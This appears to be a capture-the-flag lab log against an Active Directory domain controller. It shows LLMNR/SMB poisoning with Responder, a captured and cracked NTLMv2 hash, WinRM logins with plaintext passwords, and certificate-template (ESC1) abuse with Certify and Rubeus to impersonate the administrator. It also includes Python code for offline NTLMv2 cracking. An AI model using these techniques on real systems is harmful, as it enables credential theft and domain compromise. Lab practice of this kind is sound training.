└─$ nmap -sC -sV -Pn -v 10.129.228.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 03:03 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:03
Completed Parallel DNS resolution of 1 host. at 03:03, 0.00s elapsed
Initiating SYN Stealth Scan at 03:03
Scanning 10.129.228.253 [1000 ports]
Discovered open port 445/tcp on 10.129.228.253
Discovered open port 53/tcp on 10.129.228.253
Discovered open port 135/tcp on 10.129.228.253
Discovered open port 139/tcp on 10.129.228.253
Discovered open port 593/tcp on 10.129.228.253
Discovered open port 389/tcp on 10.129.228.253
Discovered open port 1433/tcp on 10.129.228.253
Discovered open port 88/tcp on 10.129.228.253
Discovered open port 636/tcp on 10.129.228.253
Discovered open port 464/tcp on 10.129.228.253
Discovered open port 3269/tcp on 10.129.228.253
Discovered open port 3268/tcp on 10.129.228.253
Completed SYN Stealth Scan at 03:03, 7.25s elapsed (1000 total ports)
Initiating Service scan at 03:03
Scanning 12 services on 10.129.228.253
Completed Service scan at 03:04, 47.08s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.228.253.
Initiating NSE at 03:04
Completed NSE at 03:05, 40.18s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 2.73s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-12 15:03:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.228.253:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.228.253:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-12T15:02:09
| Not valid after: 2054-10-12T15:02:09
| MD5: 6b21:24f9:e4e3:c876:c251:2483:16c9:b9b5
|_SHA-1: 81ab:c3b1:46d0:f00c:0bc0:7edb:6970:6422:9c57:c1a9
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-time:
| date: 2024-10-12T15:04:36
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.68 seconds
Raw packets sent: 1989 (87.516KB) | Rcvd: 13 (572B)
└─$ smbclient -L \\\\10.129.228.253\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.253 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
└─$ smbclient \\\\10.129.228.253\\public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1440678 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (65.0 KiloBytes/sec) (average 65.0 KiloBytes/sec)
smb: \> exit
└─$ impacket-mssqlclient sequel.htb/PublicUser@10.129.228.253
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
└─$ sudo python3 /usr/share/responder/Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [OFF]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [OFF]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [OFF]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.8]
Responder IPv6 [dead:beef:2::1006]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-9A6WSBC7SGR]
Responder Domain Name [Q02Q.LOCAL]
Responder DCE-RPC Port [49413]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:a18f0f31fd5a9e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
SQL_SVC::sequel:a18f0f31fd5a9e73:949209a630ab7e59e106e366cc2f429b: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:REGGIE1234ronnie
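What Responder captured above is an NTLMv2-SSP exchange: the SQL Server service account (`sql_svc`) was induced to authenticate to the attacker's SMB listener, and the `user::domain:challenge:ntproofstr:blob` line is exactly what hashcat mode 5600 consumes. The second line is that hash with the recovered password appended (the `hash:password` form hashcat prints for a cracked entry). The following is an added example, not part of the original writeup, showing what "cracking" that line actually means: NTProofStr is HMAC-MD5 keyed with NTOWFv2 (itself HMAC-MD5 of the NT hash over `UPPER(user) + domain`) over `server_challenge || blob`, so a candidate password is checked by recomputing that value offline. Because the NTProofStr and blob above are partly redacted, the sample line is constructed here from the page's user, domain, server challenge and recovered password with a made-up blob; it carries its own MD4 because many OpenSSL 3 builds refuse `hashlib.new("md4")`.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                           # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                           # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                           # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (what NTDS.dit stores)."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain.
    Only the user is upper-cased; the domain is used exactly as the client sent it."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server_challenge || blob."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str):
    """Split Responder's 'user::domain:challenge:ntproofstr:blob' (hashcat -m 5600 input)."""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    user, domain, challenge, proof, blob = parse_responder_line(line)
    return hmac.compare_digest(nt_proof_str(password, user, domain, challenge, blob), proof)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    return next((w for w in wordlist if check_candidate(line, w)), None)


# Constructed sample (the real NTProofStr/blob from the capture are redacted): the blob is an
# NTLMv2 "temp" structure with a zero timestamp, a fixed client challenge and a minimal AV_PAIR list.
def _av_pair(av_id: int, value: bytes) -> bytes:
    return struct.pack("<HH", av_id, len(value)) + value


SAMPLE_CHALLENGE = bytes.fromhex("a18f0f31fd5a9e73")  # server challenge from the capture above
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 0) + bytes.fromhex("aaaaaaaaaaaaaaaa")
               + b"\x00" * 4 + _av_pair(2, "sequel".encode("utf-16-le"))
               + _av_pair(1, "DC".encode("utf-16-le")) + _av_pair(0, b"") + b"\x00" * 4)
SAMPLE_LINE = "sql_svc::sequel:%s:%s:%s" % (
    SAMPLE_CHALLENGE.hex(),
    nt_proof_str("REGGIE1234ronnie", "sql_svc", "sequel", SAMPLE_CHALLENGE, SAMPLE_BLOB).hex(),
    SAMPLE_BLOB.hex(),
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack(SAMPLE_LINE, ["Password1", "Winter2022!", "REGGIE1234ronnie"]))
```

Two details matter when feeding a real capture to a cracker: the domain field is case-sensitive (it is part of the NTOWFv2 input, so `sequel` and `SEQUEL` are different hashes), and the whole blob must be kept intact because it is covered by the HMAC. Note also that NTLMv2 does not salt per user in any way that slows an attacker; a single HMAC-MD5 pair per candidate is all the work there is, which is why a service account password like the one recovered above falls to a wordlist in seconds.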
└─$ evil-winrm -i 10.129.228.253 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
└─$ evil-winrm -i 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ls
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ls
Directory: C:\Users\Ryan.Cooper\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/12/2024 8:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> cat user.txt
ee206be1fed80997ddc918f87dfa1bc3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 9:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
└─$ nxc ldap 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3 -M adcs
SMB 10.129.228.253 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.228.253 636 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS 10.129.228.253 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.228.253 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.129.228.253 389 DC Found CN: sequel-DC-CA
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe find /vulnerable /currentuser
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2391560
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAvuDH2SU6wGWrAKH+gxXuHFbPqoD0xktI7RQP7C48q9edSUi1
gW9q6rwDk2qgvTF/C36Eh4HsLOsH+bMs9kdJIMKym8EypZ+t9kj87TXcQimoizUK
uSI4Y0rHVCJRDVGMLqm7cpgRjqNqFOufQ0LPtLUR2yHm/AZ1RDpXK15AAcpjLnHW
KgH1MS5GmG8VYmqP3IbNooSR9Y21KDV5pUeK9RrbAL2lTBLD+iEZgP/+JSNweC7v
IX+NTH711lZeFYlzmK0jAswQD5+c6Z5+4T/eZQoWFVCL1WM0moLxouIZKKtpFzHs
qV/66Qz3OsRBko2nzUBFKnzMoWmPgQUuAIJqSQIDAQABAoIBAQCfrFuhm5ItNh85
dUn6EFNSo5AumpeodXv4zuqO8RLR0ZmCn28uaqzu1f7Lx8vU2F3lmJ122clevfG7
ARbgojtbS2OsBY6/m/cjamUibgbl1gFnCiUBP84ZyYk7KUXSNWBl/JiQwQMW5j6s
Z3qgAnjMOxhHznFybFiWjZMz9TDoDRok4S6fRs3/KF2UJBd8fryoXwoAvP15fRPr
X1LmVu2fWZPv3xV4piSvtkr2Fn810CLByGJaDNYJctkCOP7eZio3POY1SaVATYm0
34C4WCg8a3u6wgDgGB60Xa685y+3bdf2G62WKm6B3AXQamPswnHQ2GRnz3VlsOGY
bUSZduMNAoGBAOssuf3PsTO6Z8mLp0toNnCsWmZKJG78IyLTMTcRB0qwG5NqLaS0
ORkW0mbVMuEd8rjksPYDhbUivuPnHspv5Th06WynkN3lBheEz1hGtqBZVIYSh+3c
kXwXsfBMKDafCJTMGIdWPv1lwdKTuX2/20X6hczrJFwxnLHXJ1EqtfHPAoGBAM/H
3+cuZDZp4YbK/zy6uD8moVjDX8kQaB0O7z7n3Xr89D59XYqTXCSnAmJ2+OJzlpEx
UEty8B4EwPgaHwFJaaJkND4GeEawfcikn2IJ5+8V0fZR8YnLVTsaSUY2VWlXNh14
cBG1GK9EpOE/9dRj1bIGwXymYCSdvPu6v2+B9+BnAoGAa+sYZop6bJxrqCc32/i0
krvkt+/qDCwUC5USjox35iQuY1VkIKK7WPIKFzpaoMdXbNU1B4/SOa76HicfEBKN
A31S6JN0fP7t7rj5VS8N+0NC8EtsqRCAiottEjJAeeA81dtanjBLs4iQiwtTIYt7
Gf++iqyVAOGbYFi1KCALYi0CgYEApAGuuHoj29eDjrQY98SiviYt4TSGHNz4cUdi
jRLT/cpAuDqYZVOfvcad2T7zgTufs4drS8Kzyd4Su0NTCd76pJXXrsXIlnOlNYTL
0cTj8BIXIwjXUN7QrdA32lX04StXqbdxLmj1zRKv2qRz1GvhN56hh1SEOyLPExv7
E3dRQy0CgYEAvDqiBKupCzNnga/UbJlCp5/dffn0DUu4dwXjjZYnHhQV0d/EIsik
M9ZmgBQbPUaqQnEFkI9idm+vqZIpLY/OrXoFoqnPosX2d7uSt5Pd0LwUcqbxBKS4
UOXfFh4k2J/u45o40tEOJRotL6DSdjLtJb7ieH5pvnIbRK3/8ErFxzg=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:14.2586605
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBBlYhc5B6VRF
RqF0nL2M2FUhf03GmLLz+aBD8n+1pSIaZyFHqCw2JeJbcSpaEsVWaUK3JgtHs6wG4DTswJAaEcScmvoK
6oDGCH0JjFNeNgk8Ncu0GlPvXZSuGfBU8xqGo5JodDutpRHDgRmeFc0mWE/clWewGIdMHlBAc1xXsH94
AsdsqLb7e5YmX7E0gIDyuVjUu+gydWb7dR/6wvLCYGMjrMe472Y1eFpmDehFb5mB0VcwkpbCogRAOLhw
pV3SlWTUi/RRnEePNjidjPWJ2qDNxi4c348m+nSieT+yioUilRZk5qYqqDm+jT6+TddI7o/3UwVHuLZd
mXer0J3x1LyJQ90/2V17iHHrQVAPpt8bHJZ5Yp70SV8i/zSpRZMC51Eq+jehr+uGa9UWffjf1/outSmi
2Mr1j6dq/1kqWmyclkI+bfJTx6/byLr7wDGQU91VcphIQ5t/sjO3DgRoYzvWTh2N2KdF9f0qyB7riscJ
i2q2KpDPbjZOnbadjDOdlxFwO94MzY/NLoOLkKWKYzeZ69nWntKOLDmdaQcgp3x5G+NXiMSKaHti5zSB
7GSLl+M+Zm9HJf73GufEeSBiwH5gSpnzpNQDzTW3GI90BNXOl6AUcAP7CPkdTdisZyznHiYXFyM/DAdc
bMJx9jQkPFGBAkMALnlZXzRd1O0AwPMr8SPXubhPno6rBtk0ZyFYD85Ni+JnoFgoHxSZ/h2EvgBSTRBH
m2JEYn+bsmV52kxc/jke8MNyjvm4xui1p4AHm98hFgoN9wHzK2JvBBB8v4iDaRB5IP995zqCBstCqbhX
